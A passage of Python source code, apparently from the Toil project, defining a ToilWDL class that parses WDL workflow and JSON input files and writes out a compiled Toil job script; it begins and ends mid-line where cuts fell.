logging.getLogger(__name__)\n\n\nclass ToilWDL:\n '''\n A program to run WDL input files using native Toil scripts.\n\n Requires a WDL file, and a JSON file. The WDL file contains ordered commands,\n and the JSON file contains input values for those commands. To run in Toil,\n these two files must be parsed, restructured into python dictionaries, and\n then compiled into a Toil formatted python script. This compiled Toil script\n is deleted after running unless the user specifies: \"--dont_delete_compiled\"\n as an option.\n\n The WDL parser was auto-generated from the Broad's current WDL grammar file:\n https://github.com/openwdl/wdl/blob/master/parsers/grammar.hgr\n using Scott Frazer's Hermes: https://github.com/scottfrazer/hermes\n Thank you Scott Frazer!\n\n Currently in alpha testing, and known to work with the Broad's GATK tutorial\n set for WDL on their main wdl site:\n software.broadinstitute.org/wdl/documentation/topic?name=wdl-tutorials\n\n And ENCODE's WDL workflow:\n github.com/ENCODE-DCC/pipeline-container/blob/master/local-workflows/encode_mapping_workflow.wdl\n\n Additional support to be broadened to include more features soon.\n '''\n\n def __init__(self, wdl_filename, secondary_filename, output_directory):\n\n # inputs\n self.wdl_file = wdl_filename\n self.secondary_file = secondary_filename\n self.output_directory = output_directory\n\n if not os.path.exists(self.output_directory):\n try:\n os.makedirs(self.output_directory)\n except:\n raise OSError(\n 'Could not create directory. Insufficient permissions or disk space most likely.')\n\n self.output_file = os.path.join(self.output_directory,\n 'toilwdl_compiled.py')\n\n # only json is required; tsv/csv are optional\n self.json_dict = {}\n self.tsv_dict = {}\n self.csv_dict = {}\n\n # holds task skeletons from WDL task objects\n self.tasks_dictionary = {}\n\n # holds workflow structure from WDL workflow objects\n self.workflows_dictionary = {}\n\n # unique iterator to add to cmd names\n self.command_number = 0\n\n # unique number for a job\n self.task_number = 0\n\n # a job's 'level' on the DAG\n self.task_priority = 0\n\n def find_asts(self, ast_root, name):\n '''\n Finds an AST node with the given name and the entire subtree under it.\n A function borrowed from scottfrazer. Thank you Scott Frazer!\n\n :param ast_root: The WDL AST. The whole thing generally, but really\n any portion that you wish to search.\n :param name: The name of the subtree you're looking for, like \"Task\".\n :return: nodes representing the AST subtrees matching the \"name\" given.\n '''\n nodes = []\n if isinstance(ast_root, wdl_parser.AstList):\n for node in ast_root:\n nodes.extend(self.find_asts(node, name))\n elif isinstance(ast_root, wdl_parser.Ast):\n if ast_root.name == name:\n nodes.append(ast_root)\n for attr_name, attr in ast_root.attributes.items():\n nodes.extend(self.find_asts(attr, name))\n return nodes\n\n def create_tsv_array(self, tsv_filepath):\n '''\n Take a tsv filepath and return an array; e.g. [[],[],[]].\n\n For example, a file containing:\n\n 1 2 3\n 4 5 6\n 7 8 9\n\n would return the array: [['1','2','3'], ['4','5','6'], ['7','8','9']]\n\n :param tsv_filepath:\n :return: tsv_array\n '''\n tsv_array = []\n with open(tsv_filepath, \"r\") as f:\n data_file = csv.reader(f, delimiter=\"\\t\")\n for line in data_file:\n tsv_array.append(line)\n return (tsv_array)\n\n def create_csv_array(self, csv_filepath):\n '''\n Take a csv filepath and return an array; e.g. [[],[],[]].\n\n For example, a file containing:\n\n 1,2,3\n 4,5,6\n 7,8,9\n\n would return the array: [['1','2','3'], ['4','5','6'], ['7','8','9']]\n\n :param csv_filepath:\n :return: csv_array\n '''\n csv_array = []\n with open(csv_filepath, \"r\") as f:\n data_file = csv.reader(f)\n for line in data_file:\n csv_array.append(line)\n return (csv_array)\n\n def dict_from_YML(self, YML_file):\n '''\n Not written yet. Use JSON. It's better anyway.\n\n :param YML_file: A yml file with extension '*.yml' or '*.yaml'.\n :return: Nothing.\n '''\n raise NotImplementedError('.y(a)ml support is currently underwhelming.')\n\n def dict_from_JSON(self, JSON_file):\n '''\n Takes a WDL-mapped json file and creates a dict containing the bindings.\n The 'return' value is only used for unittests.\n\n :param JSON_file: A required JSON file containing WDL variable bindings.\n :return: Returns the self.json_dict purely for unittests.\n '''\n\n # TODO: Add context support for variables within multiple wdl files\n with open(JSON_file) as data_file:\n data = json.load(data_file)\n for d in data:\n d_list = d.split('.')\n self.json_dict[d_list[-1]] = data[d]\n return self.json_dict\n\n def create_tasks_dict(self, ast):\n '''\n Parse each \"Task\" in the AST. This will create self.tasks_dictionary,\n where each task name is a key.\n\n :return: Creates the self.tasks_dictionary necessary for much of the\n parser. Returning it is only necessary for unittests.\n '''\n tasks = self.find_asts(ast, 'Task')\n for task in tasks:\n self.parse_task(task)\n return self.tasks_dictionary\n\n def parse_task(self, task):\n '''\n Parses a WDL task AST subtree.\n\n Currently looks at and parses 4 sections:\n 1. Declarations (e.g. string x = 'helloworld')\n 2. Commandline (a bash command with dynamic variables inserted)\n 3. Runtime (docker image; disk; CPU; RAM; etc.)\n 4. Outputs (expected return values/files)\n\n :param task: An AST subtree of a WDL \"Task\".\n :return: Returns nothing but adds a task to the self.tasks_dictionary\n necessary for much of the parser.\n '''\n\n task_name = task.attributes[\"name\"].source_string\n\n # task declarations\n declaration_array = []\n for declaration_subAST in task.attr(\"declarations\"):\n var_name, var_type, var_value = self.parse_task_declaration(\n declaration_subAST)\n var_truple = (var_name, var_type, var_value)\n declaration_array.append(var_truple)\n self.tasks_dictionary.setdefault(task_name, {})[\n 'inputs'] = declaration_array\n\n for section in task.attr(\"sections\"):\n\n # task commandline entries section [command(s) to run]\n if section.name == \"RawCommand\":\n command_array = self.parse_task_rawcommand(section)\n self.tasks_dictionary.setdefault(task_name, {})[\n 'raw_commandline'] = command_array\n\n # task runtime section (docker image; disk; CPU; RAM; etc.)\n if section.name == \"Runtime\":\n runtime_array = self.parse_task_runtime(section)\n self.tasks_dictionary.setdefault(task_name, {})[\n 'runtime'] = runtime_array\n\n # task output filenames section (expected return values/files)\n if section.name == \"Outputs\":\n output_array = self.parse_task_outputs(section)\n self.tasks_dictionary.setdefault(task_name, {})[\n 'outputs'] = output_array\n\n def parse_task_declaration(self, declaration_subAST):\n '''\n Parses the declaration section of the WDL task AST subtree.\n\n So far tasks only contain stubs without value assignment, such as:\n\n String my_name\n String your_name\n Int two_chains_i_mean_names\n\n But in the future who knows. The var_value variable below is a stub to\n potentially allow for variable assignment in the future.\n\n :param declaration_subAST: Some subAST representing a task declaration\n like: 'String file_name'\n :return: var_name, var_type, var_value\n Example:\n Input subAST representing: 'String file_name'\n Output: var_name='file_name', var_type='String', var_value=None\n '''\n\n # variable name\n if declaration_subAST.attr(\"name\"):\n if isinstance(declaration_subAST.attr(\"name\"), wdl_parser.Terminal):\n var_name = declaration_subAST.attr(\"name\").source_string\n elif isinstance(declaration_subAST.attr(\"name\"), wdl_parser.Ast):\n raise NotImplementedError\n elif isinstance(declaration_subAST.attr(\"name\"),\n wdl_parser.AstList):\n raise NotImplementedError\n\n # variable type\n if declaration_subAST.attr(\"type\"):\n\n # if the variable type is a primitive\n if isinstance(declaration_subAST.attr(\"type\"), wdl_parser.Terminal):\n var_type = declaration_subAST.attr(\"type\").source_string\n\n # if the variable type is not a primitive (i.e. an Array)\n elif isinstance(declaration_subAST.attr(\"type\"), wdl_parser.Ast):\n\n if declaration_subAST.attr(\"type\").attr(\"name\"):\n if isinstance(declaration_subAST.attr(\"type\").attr(\"name\"),\n wdl_parser.Terminal):\n var_type = declaration_subAST.attr(\"type\").attr(\n \"name\").source_string\n if isinstance(declaration_subAST.attr(\"type\").attr(\"name\"),\n wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(declaration_subAST.attr(\"type\").attr(\"name\"),\n wdl_parser.AstList):\n raise NotImplementedError\n\n # if the variable type goes deeper and is for instance: Array[Array[File]]\n if declaration_subAST.attr(\"type\").attr(\"subtype\"):\n if isinstance(\n declaration_subAST.attr(\"type\").attr(\"subtype\"),\n wdl_parser.Terminal):\n raise NotImplementedError\n if isinstance(\n declaration_subAST.attr(\"type\").attr(\"subtype\"),\n wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(\n declaration_subAST.attr(\"type\").attr(\"subtype\"),\n wdl_parser.AstList):\n for subtype in declaration_subAST.attr(\"type\").attr(\n \"subtype\"):\n var_type = var_type + subtype.source_string\n\n elif isinstance(declaration_subAST.attr(\"type\"),\n wdl_parser.AstList):\n raise NotImplementedError\n\n var_value = None # placeholder to be implemented potentially later\n\n return var_name, var_type, var_value\n\n def parse_task_rawcommand(self, rawcommand_subAST):\n '''\n Parses the rawcommand section of the WDL task AST subtree.\n\n Task \"rawcommands\" are divided into many parts. There are 2 types of\n parts: normal strings, & variables that can serve as changeable inputs.\n\n The following example command:\n 'echo ${variable1} ${variable2} > output_file.txt'\n\n Has 5 parts:\n Normal String: 'echo '\n Variable Input: variable1\n Normal String: ' '\n Variable Input: variable2\n Normal String: ' > output_file.txt'\n\n Variables can also have additional conditions, like 'sep', which is like\n the python ''.join() function and in WDL looks like: ${sep=\" -V \" GVCFs}\n and would be translated as: ' -V '.join(GVCFs).\n\n :param rawcommand_subAST: A subAST representing some bash command.\n :return: A list=[] of tuples=() representing the parts of the command:\n e.g. [(command_var, command_type, additional_conditions_list), ...]\n Where: command_var = 'GVCFs'\n command_type = 'variable'\n command_actions = {'sep': ' -V '}\n '''\n command_array = []\n for code_snippet in rawcommand_subAST.attributes[\"parts\"]:\n command_actions = {}\n\n # normal string\n if isinstance(code_snippet, wdl_parser.Terminal):\n command_var = code_snippet.source_string\n command_type = 'normal_string'\n\n # a variable like ${dinosaurDNA}\n if isinstance(code_snippet, wdl_parser.Ast):\n\n if isinstance(code_snippet.attributes[\"expr\"],\n wdl_parser.Terminal):\n command_var = code_snippet.attributes[\"expr\"].source_string\n command_type = 'variable'\n if isinstance(code_snippet.attributes[\"expr\"], wdl_parser.Ast):\n\n if code_snippet.attributes[\"expr\"].attributes['lhs']:\n if isinstance(\n code_snippet.attributes[\"expr\"].attributes[\n 'lhs'], wdl_parser.Terminal):\n command_var = \\\n code_snippet.attributes[\"expr\"].attributes[\n 'lhs'].source_string\n command_type = 'variable'\n if isinstance(\n code_snippet.attributes[\"expr\"].attributes[\n 'lhs'], wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(\n code_snippet.attributes[\"expr\"].attributes[\n 'lhs'], wdl_parser.Ast):\n raise NotImplementedError\n\n if code_snippet.attributes[\"expr\"].attributes['rhs']:\n raise NotImplementedError\n\n if isinstance(code_snippet.attributes[\"expr\"],\n wdl_parser.AstList):\n raise NotImplementedError\n\n # variables with context like ${sep=\" -V \" GVCFs}\n if code_snippet.attributes['attributes']:\n for additional_conditions in code_snippet.attributes[\n 'attributes']:\n keyword_for_a_command = \\\n additional_conditions.attributes['key'].source_string\n some_value_used_by_the_keyword = \\\n additional_conditions.attributes['value'].source_string\n command_actions[\n keyword_for_a_command] = some_value_used_by_the_keyword\n\n if isinstance(code_snippet, wdl_parser.AstList):\n raise NotImplementedError\n\n command_array.append((command_var,\n command_type,\n command_actions))\n return command_array\n\n def parse_task_runtime(self, runtime_subAST):\n '''\n Parses the runtime section of the WDL task AST subtree.\n\n The task \"runtime\" section currently supports context fields for a\n docker container, CPU resources, RAM resources, and disk resources.\n\n :param runtime_subAST: A subAST representing runtime parameters.\n :return: A list=[] of runtime attributes, for example:\n runtime_attributes = [('docker','quay.io/encode-dcc/map:v1.0'),\n ('cpu','2'),\n ('memory','17.1 GB'),\n ('disks','local-disk 420 HDD')]\n '''\n # map\n runtime_attributes = []\n if isinstance(runtime_subAST.attr(\"map\"), wdl_parser.Terminal):\n raise NotImplementedError\n elif isinstance(runtime_subAST.attr(\"map\"), wdl_parser.Ast):\n raise NotImplementedError\n elif isinstance(runtime_subAST.attr(\"map\"), wdl_parser.AstList):\n for mapping in runtime_subAST.attr(\"map\"):\n if isinstance(mapping, wdl_parser.Terminal):\n raise NotImplementedError\n elif isinstance(mapping, wdl_parser.Ast):\n map_key = mapping.attr(\"key\").source_string\n map_value = mapping.attr(\"value\").source_string\n runtime_attributes.append((map_key, map_value))\n elif isinstance(mapping, wdl_parser.AstList):\n raise NotImplementedError\n return runtime_attributes\n\n def parse_task_outputs(self, i):\n '''\n Parse the WDL output section.\n\n Outputs are like declarations, with a type, name, and value. Examples:\n\n ------------\n Simple Cases\n ------------\n\n 'Int num = 7'\n var_name: 'num'\n var_type: 'Int'\n var_value: 7\n\n String idea = 'Lab grown golden eagle burgers.'\n var_name: 'idea'\n var_type: 'String'\n var_value: 'Lab grown golden eagle burgers.'\n\n File ideaFile = 'goldenEagleStemCellStartUpDisrupt.txt'\n var_name: 'ideaFile'\n var_type: 'File'\n var_value: 'goldenEagleStemCellStartUpDisrupt.txt'\n\n -------------------\n More Abstract Cases\n -------------------\n\n Array[File] allOfMyTerribleIdeas = glob(*.txt)[0]\n var_name: 'allOfMyTerribleIdeas'\n var_type**: 'File'\n var_value: [*.txt]\n var_actions: {'index_lookup': '0', 'glob': 'None'}\n\n **toilwdl.py converts 'Array[File]' to 'ArrayFile'\n\n :return: output_array representing outputs generated by the job/task:\n e.g. x = [(var_name, var_type, var_value, var_actions), ...]\n '''\n output_array = []\n for j in i.attributes['attributes']:\n if j.name == 'Output':\n var_base_type = j.attributes['type']\n var_base_name = j.attributes['name']\n var_base_value = j.attributes['expression']\n\n var_name = self.parse_task_output_name(var_base_name)\n var_type = self.parse_task_output_type(var_base_type)\n var_value, var_actions = self.parse_task_output_value(\n var_base_value)\n\n output_array.append(\n (var_name, var_type, var_value, var_actions))\n return output_array\n\n def parse_task_output_name(self, base_name_AST):\n '''\n Discern a task output's var_name.\n\n Example:\n 'Int num = 7'\n var_name: 'num'\n var_type: 'Int'\n var_value: 7\n\n :param base_name_AST: An AST subTree representing a task output's name.\n :return: var_name\n '''\n if isinstance(base_name_AST, wdl_parser.Terminal):\n # \"txtFiles\" for Array[File] txtFiles = glob(*.txt)\n var_name = base_name_AST.source_string\n if isinstance(base_name_AST, wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(base_name_AST, wdl_parser.AstList):\n raise NotImplementedError\n\n return var_name\n\n def parse_task_output_type(self, base_type_AST):\n '''\n Discern a task output's var_type.\n\n Example:\n 'Int num = 7'\n var_name: 'num'\n var_type: 'Int'\n var_value: 7\n\n :param base_type_AST: An AST subTree representing a task output's type.\n :return: var_type\n '''\n\n if isinstance(base_type_AST, wdl_parser.Terminal):\n # primitive_type: 'Boolean' | 'Int' | 'Float' | 'File' | 'String'\n var_type = base_type_AST.source_string\n if isinstance(base_type_AST, wdl_parser.Ast):\n # array_type: 'Array' '[' ($primitive_type | $object_type | $array_type) ']'\n # concatenate into type + subtype1 + subtype2 + ...\n if isinstance(base_type_AST.attributes['name'],\n wdl_parser.Terminal):\n # Something like \"Array\" for Array[File] txtFiles = glob(*.txt)\n var_type = base_type_AST.attributes['name'].source_string\n if isinstance(base_type_AST.attributes['subtype'],\n wdl_parser.AstList):\n for each_subtype in base_type_AST.attributes['subtype']:\n # \"File\" for Array[File] txtFiles = glob(*.txt)\n var_type = var_type + each_subtype.source_string\n if isinstance(base_type_AST, wdl_parser.AstList):\n raise NotImplementedError\n\n return var_type\n\n def parse_task_output_value(self, base_value_AST):\n '''\n Discern a task output's var_value.\n\n Example:\n 'Int num = 7'\n var_name: 'num'\n var_type: 'Int'\n var_value: 7\n\n Sometimes this does not exist though, for example:\n 'File x = stdout()'\n var_name: 'x'\n var_type: 'File'\n var_value:\n\n In which case, default to just ''. 'stdout' is added to the var actions.\n\n :param base_value_AST: An AST subTree representing a task output's value.\n :return var_value, var_action: The variable's declared value and any\n special actions that need to be taken.\n '''\n\n var_action = {}\n\n # a primitive var_value like '7' (shown above)\n if isinstance(base_value_AST, wdl_parser.Terminal):\n var_value = base_value_AST.source_string\n\n # this is not a primitive\n if isinstance(base_value_AST, wdl_parser.Ast):\n orderedDictOfVars = base_value_AST.attributes\n\n if 'name' in orderedDictOfVars:\n var_value_name = orderedDictOfVars['name']\n if isinstance(var_value_name, wdl_parser.Terminal):\n var_action[var_value_name.source_string] = 'None'\n\n if 'params' in orderedDictOfVars:\n var_value_params = orderedDictOfVars['params']\n if isinstance(var_value_params, wdl_parser.AstList):\n var_value = []\n for param in var_value_params:\n if isinstance(param, wdl_parser.Terminal):\n var_value.append(param.source_string)\n\n # mostly determine actions for specific outputs\n if 'lhs' in orderedDictOfVars:\n var_value_lhs = base_value_AST.attributes['lhs']\n if isinstance(var_value_lhs, wdl_parser.Ast):\n orderedDictOfVars = var_value_lhs.attributes\n if 'name' in orderedDictOfVars:\n var_value_name = orderedDictOfVars['name']\n if isinstance(var_value_name, wdl_parser.Terminal):\n var_action[var_value_name.source_string] = 'None'\n if 'params' in orderedDictOfVars:\n var_value_params = orderedDictOfVars['params']\n if isinstance(var_value_params, wdl_parser.Terminal):\n var_value = [var_value_params]\n if isinstance(var_value_params, wdl_parser.AstList):\n var_value = []\n for param in var_value_params:\n if isinstance(param, wdl_parser.Terminal):\n var_value.append(param.source_string)\n\n # this is not implemented at the moment, but later will be important\n # for returning index values and should be incorporated below for\n # 'ArrayOrMapLookup' and such-like.\n if 'rhs' in orderedDictOfVars:\n var_value_rhs = orderedDictOfVars['rhs']\n if isinstance(var_value_rhs, wdl_parser.Terminal):\n raise NotImplementedError\n if isinstance(var_value_rhs, wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(var_value_rhs, wdl_parser.AstList):\n raise NotImplementedError\n\n if base_value_AST.name == 'ArrayOrMapLookup':\n try:\n index_value = base_value_AST.attributes['rhs'].source_string\n var_action['index_lookup'] = index_value\n except:\n raise NotImplementedError\n\n if not var_value:\n var_value = ''\n\n return var_value, var_action\n\n def create_workflows_dict(self, ast):\n '''\n Parse each \"Workflow\" in the AST. This will create self.workflows_dictionary,\n where each called job is a tuple key of the form: (priority#, job#, name, alias).\n\n :return: Creates the self.workflows_dictionary necessary for much of the\n parser. Returning it is only necessary for unittests.\n '''\n workflows = self.find_asts(ast, 'Workflow')\n for workflow in workflows:\n self.parse_workflow(workflow)\n return self.workflows_dictionary\n\n def parse_workflow(self, workflow):\n '''\n Parses a WDL workflow AST subtree.\n\n Currently looks at and parses 3 sections:\n 1. Declarations (e.g. string x = 'helloworld')\n 2. Calls (similar to a python def)\n 3. Scatter (which expects to map to a Call or multiple Calls)\n\n Returns nothing but creates the self.workflows_dictionary necessary for much\n of the parser.\n\n :param workflow: An AST subtree of a WDL \"Workflow\".\n :return: Returns nothing but adds a workflow to the\n self.workflows_dictionary necessary for much of the parser.\n '''\n workflow_name = workflow.attr('name').source_string\n\n wf_declared_dict = {}\n for section in workflow.attr(\"body\"):\n\n if section.name == \"Declaration\":\n var_name, var_map = self.parse_workflow_declaration(section)\n wf_declared_dict[var_name] = var_map\n self.workflows_dictionary.setdefault(workflow_name, {})[\n 'wf_declarations'] = wf_declared_dict\n\n if section.name == \"Scatter\":\n self.parse_workflow_scatter(section, workflow_name)\n self.task_priority = self.task_priority + 1\n\n if section.name == \"Call\":\n self.task_priority = self.task_priority + 1\n self.task_number = self.task_number + 1\n task_being_called = section.attributes['task'].source_string\n if section.attributes['alias']:\n task_alias = section.attributes['alias'].source_string\n else:\n task_alias = task_being_called\n job = self.parse_workflow_call(section)\n self.workflows_dictionary.setdefault((self.task_priority,\n self.task_number,\n task_being_called,\n task_alias), {})[\n 'job_declarations'] = job\n\n def parse_workflow_declaration(self, wf_declaration_subAST):\n '''\n Parses a WDL declaration AST subtree into a string and a python\n dictionary containing its 'type' and 'value'.\n\n For example:\n var_name = refIndex\n var_map = {'type': File,\n 'value': bamIndex}\n\n :param wf_declaration_subAST: An AST subtree of a workflow declaration.\n :return: var_name, which is the name of the declared variable\n :return: var_map, a dictionary with keys for type and value.\n e.g. {'type': File, 'value': bamIndex}\n '''\n var_map = {}\n tsv = False\n if isinstance(wf_declaration_subAST.attr(\"type\"), wdl_parser.Terminal):\n var_type = wf_declaration_subAST.attr(\"type\").source_string\n elif isinstance(wf_declaration_subAST.attr(\"type\"), wdl_parser.Ast):\n var_type = wf_declaration_subAST.attr(\"type\").attributes[\n \"name\"].source_string\n elif isinstance(wf_declaration_subAST.attr(\"type\"), wdl_parser.AstList):\n raise NotImplementedError\n var_name = wf_declaration_subAST.attr(\"name\").source_string\n\n # only read_tsv currently supported\n tsv_array = []\n if wf_declaration_subAST.attr(\"expression\"):\n wdl_function_called = \\\n wf_declaration_subAST.attr(\"expression\").attributes[\n 'name'].source_string\n if wdl_function_called == 'read_tsv':\n # get all params for 'read_tsv'\n # expecting one file name pointing to a path in the JSON/YML secondary file\n for j in wf_declaration_subAST.attr(\"expression\").attributes[\n 'params']:\n filename = j.source_string\n tsv_filepath = self.json_dict[filename]\n tsv_array = self.create_tsv_array(tsv_filepath)\n self.tsv_dict[var_name] = tsv_array\n tsv = True\n\n if var_name in self.json_dict:\n var_value = self.json_dict[var_name]\n # deal with arrays other than tsv files\n elif var_type == 'Array':\n pass\n else:\n raise RuntimeError(\n 'Variable in workflow declarations not found in secondary file.')\n\n if tsv:\n var_map['type'] = var_type\n var_map['value'] = tsv_array\n else:\n var_map['type'] = var_type\n var_map['value'] = var_value\n\n return var_name, var_map\n\n def parse_workflow_scatter(self, section, workflow_name):\n # name of iterator; e.g. 'sample'\n scatter_counter = section.attributes['item'].source_string\n\n # name of collection to iterate over\n scatter_collection = section.attributes['collection'].source_string\n\n self.workflows_dictionary.setdefault('scatter_calls', {})[\n scatter_collection] = scatter_counter\n\n if scatter_collection in self.workflows_dictionary[workflow_name][\n 'wf_declarations']:\n if self.workflows_dictionary[workflow_name]['wf_declarations'][\n scatter_collection]['type'] == 'Array':\n scatter_array = \\\n self.workflows_dictionary[workflow_name]['wf_declarations'][\n scatter_collection]['value']\n self.parse_workflow_scatter_array(section, scatter_array)\n else:\n raise RuntimeError(\n 'Scatter failed. Scatter collection is not an array.')\n else:\n raise RuntimeError(\n 'Scatter failed. Scatter collection not found in workflows_dictionary.')\n\n def parse_workflow_scatter_array(self, section, scatter_array):\n scatter_num = 0\n for set_of_vars in scatter_array:\n for j in section.attributes['body']:\n self.task_number = self.task_number + 1\n task_being_called = j.attributes['task'].source_string\n if j.attributes['alias']:\n task_alias = j.attributes['alias'].source_string\n else:\n task_alias = task_being_called\n job = self.parse_workflow_call(j, scatter_num=str(scatter_num))\n self.workflows_dictionary.setdefault((self.task_priority,\n self.task_number,\n task_being_called,\n task_alias), {})[\n 'job_declarations'] = job\n scatter_num = scatter_num + 1\n\n def parse_workflow_call(self, i, scatter_num=None):\n '''\n Parses a WDL workflow call AST subtree to give the variable mappings for\n that particular job/task \"call\".\n\n :param i: WDL workflow job object\n :return: python dictionary of io mappings for that job call\n '''\n io_map = {}\n\n if i.attributes['body']:\n if i.attributes['body'].attributes['io']:\n for g in i.attributes['body'].attributes['io']:\n for k in g.attributes['map']:\n if isinstance(k.attributes['key'], wdl_parser.Terminal):\n key_name = k.attributes['key'].source_string\n if isinstance(k.attributes['value'],\n wdl_parser.Terminal):\n value_name = k.attributes['value'].source_string\n value_type = k.attributes['value'].str\n if isinstance(k.attributes['key'], wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(k.attributes['value'], wdl_parser.Ast):\n if k.attributes['value'].attributes[\n 'rhs'].str == 'integer':\n output_variable = \\\n k.attributes['value'].attributes[\n 'rhs'].source_string\n task = k.attributes['value'].attributes[\n 'lhs'].source_string\n if scatter_num:\n value_name = task + '[' + scatter_num + '][' + output_variable + ']'\n else:\n value_name = task + '[' + output_variable + ']'\n value_type = 'index_value'\n elif k.attributes['value'].attributes[\n 'rhs'].str == 'identifier':\n output_variable = \\\n k.attributes['value'].attributes[\n 'rhs'].source_string\n task = k.attributes['value'].attributes[\n 'lhs'].source_string\n value_name = task + ' ' + output_variable\n value_type = 'output'\n else:\n raise RuntimeError('Unsupported rhs type.')\n\n io_map.setdefault(key_name, {})['name'] = value_name\n io_map.setdefault(key_name, {})['type'] = value_type\n return (io_map)\n\n def write_modules(self):\n # string used to write imports to the file\n module_string = heredoc_wdl('''\n from toil.job import Job\n from toil.common import Toil\n from toil.lib.docker import apiDockerCall\n from toil.wdl.toilwdl import generate_docker_bashscript_file\n from toil.wdl.toilwdl import recursive_glob\n import fnmatch\n import subprocess\n import os\n import errno\n import glob\n import time\n import shutil\n import shlex\n import uuid\n import logging\n\n logger = logging.getLogger(__name__)\n\n\n ''')\n return module_string\n\n def write_main(self):\n '''\n Writes out a huge string representing the main section of the python\n compiled toil script.\n\n Currently looks at and writes 5 sections:\n 1. JSON Variables (includes importing and preparing files as tuples)\n 2. TSV Variables (includes importing and preparing files as tuples)\n 3. CSV Variables (includes importing and preparing files as tuples)\n 4. Wrapping each WDL \"task\" function as a toil job\n 5. List out children and encapsulated jobs by priority, then start job0.\n\n This should create variable declarations necessary for function calls.\n Map file paths appropriately and store them in the toil fileStore so\n that they are persistent from job to job. Create job wrappers for toil.\n And finally write out, and run the jobs in order of priority using the\n addChild and encapsulate commands provided by toil.\n\n :return: giant string containing the main def for the toil script.\n '''\n\n main_section = ''\n\n # write out the JSON/YML file declarations\n main_header = self.write_main_header()\n main_section = main_section + main_header\n\n # write out the JSON/YML file declarations\n main_section = main_section + '\\n\\n # JSON Variables\\n'\n scatter_vars_to_write = self.write_main_JSON()\n main_section = main_section + scatter_vars_to_write\n\n # write out TSV variable declarations\n main_section = main_section + '\\n\\n # TSV Variables\\n'\n scatter_vars_to_write = self.write_main_arrayarrayfile(self.tsv_dict)\n main_section = main_section + scatter_vars_to_write\n\n # write out CSV variable declarations\n main_section = main_section + '\\n\\n # CSV Variables\\n'\n scatter_vars_to_write = self.write_main_arrayarrayfile(self.csv_dict)\n main_section = main_section + scatter_vars_to_write\n\n # write toil job wrappers with input vars\n jobs_to_write = self.write_main_jobwrappers()\n main_section = main_section + jobs_to_write\n\n # write toil job calls\n jobs_to_write = self.write_main_jobcalls()\n main_section = main_section + jobs_to_write\n\n # write toil job stats\n jobs_to_write = self.write_main_stats()\n main_section = main_section + jobs_to_write\n\n return main_section\n\n def write_main_header(self):\n log_dir = os.path.join(self.output_directory, \"wdl-stats.log\")\n main_header_dict = {\"log_dir\": log_dir}\n main_header = heredoc_wdl('''\n\n if __name__==\"__main__\":\n options = Job.Runner.getDefaultOptions(\"./toilWorkflowRun\")\n with Toil(options) as toil:\n start = time.time()\n with open(\"{log_dir}\", \"a+\") as f:\n f.write(\"Starting WDL Job @ \" + str(time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())) + \"\\\\n\\\\n\")\n\n ''', main_header_dict)\n return main_header\n\n def write_main_arrayarrayfile(self, aaf_dict):\n '''\n Writes a loop used to import files from Array[Array[File]] type\n objects (typically created by csv and tsv files).\n\n :return: A string representing this loop.\n '''\n main_section = ''\n for aaf in aaf_dict:\n if aaf in self.workflows_dictionary['scatter_calls']:\n iterator = self.workflows_dictionary['scatter_calls'][aaf]\n\n arrayarray_dict = {\"aaf\": aaf,\n \"iterator\": iterator,\n \"aaf_value\": str(self.tsv_dict[aaf])}\n arrayarray_loop = heredoc_wdl('''\n {aaf} = []\n {aaf}0 = {aaf_value}\n for {iterator}0 in {aaf}0:\n {iterator} = []\n for i in {iterator}0:\n if os.path.isfile(str(i)):\n {iterator}0 = toil.importFile(\"file://\" + os.path.abspath(i))\n {iterator}0_preserveThisFilename = os.path.basename(i)\n {iterator}.append(({iterator}0, {iterator}0_preserveThisFilename))\n else:\n {iterator}.append(i)\n {aaf}.append({iterator})''', arrayarray_dict,\n indent=' ')\n main_section = main_section + arrayarray_loop\n # write for docker as well\n return main_section\n\n def write_main_JSON(self):\n '''\n Writes file imports and declared variables from the secondary JSON file.\n :return: A string representing these file imports and declared variables.\n '''\n main_section = ''\n\n input_dict = self.json_dict\n for dict_var in input_dict:\n v = input_dict[dict_var]\n # WDL sometimes supplies a list of file paths\n # later potentially implement a catch for a list of lists\n if type(v) is list:\n list_iterator = 0\n for item in v:\n importFile_section = self.write_main_importFile(item,\n dict_var,\n list_iterator)\n main_section = main_section + importFile_section\n list_iterator = list_iterator + 1\n list_iterator = 0\n if os.path.isfile(v[0]):\n main_section = main_section + ' ' + dict_var + ' = ['\n for item in v:\n main_section = main_section + '(' + dict_var + str(list_iterator) + ', ' + dict_var + str(list_iterator) + '_preserveThisFilename), '\n list_iterator = list_iterator + 1\n if main_section.endswith(', '):\n main_section = main_section[:-2]\n main_section = main_section + ']\\n'\n else:\n main_section = main_section + ' ' + dict_var + ' = ['\n for item in v:\n main_section = main_section + '(' + dict_var + str(list_iterator) + '), '\n if main_section.endswith(', '):\n main_section = main_section[:-2]\n main_section = main_section + ']\\n'\n else:\n main_section = main_section + self.write_main_importFile(v, dict_var)\n return main_section\n\n def write_main_importFile(self, item, input_var, list_iterator=None):\n '''\n Writes file imports and declared variables.\n\n :param item:\n :param input_var:\n :param list_iterator:\n :return: A string representing these file imports and declared variables.\n '''\n main_section = ''\n\n # if it's a file, then import and save the original filename\n if os.path.isfile(str(item)) or os.path.isfile(str(os.path.join(os.getcwd(), item))):\n filename = os.path.basename(item)\n if list_iterator is None:\n main_section = main_section + ' ' + input_var + '0 = toil.importFile(\"file://' + os.path.abspath(item) + '\")\\n'\n main_section = main_section + ' ' + input_var + '0_preserveThisFilename = \"' + filename + '\"\\n'\n main_section = main_section + ' ' + input_var + ' = (' + input_var + '0, ' + input_var + '0_preserveThisFilename)\\n'\n else:\n main_section = main_section + ' ' + input_var + str(\n list_iterator) + ' = toil.importFile(\"file://' + os.path.abspath(\n item) + '\")\\n'\n main_section = main_section + ' ' + input_var + str(\n list_iterator) + '_preserveThisFilename = \"' + filename + '\"\\n'\n # elif string, add quotes\n elif isinstance(item, (str, unicode)):\n if list_iterator is None:\n main_section = main_section + ' ' + input_var + ' = \"' + item + '\"\\n'\n else:\n main_section = main_section + ' ' + input_var + str(\n list_iterator) + ' = \"' + item + '\"\\n'\n # otherwise, just simply declare the variable\n else:\n if list_iterator is None:\n main_section = main_section + ' ' + input_var + ' = ' + item + 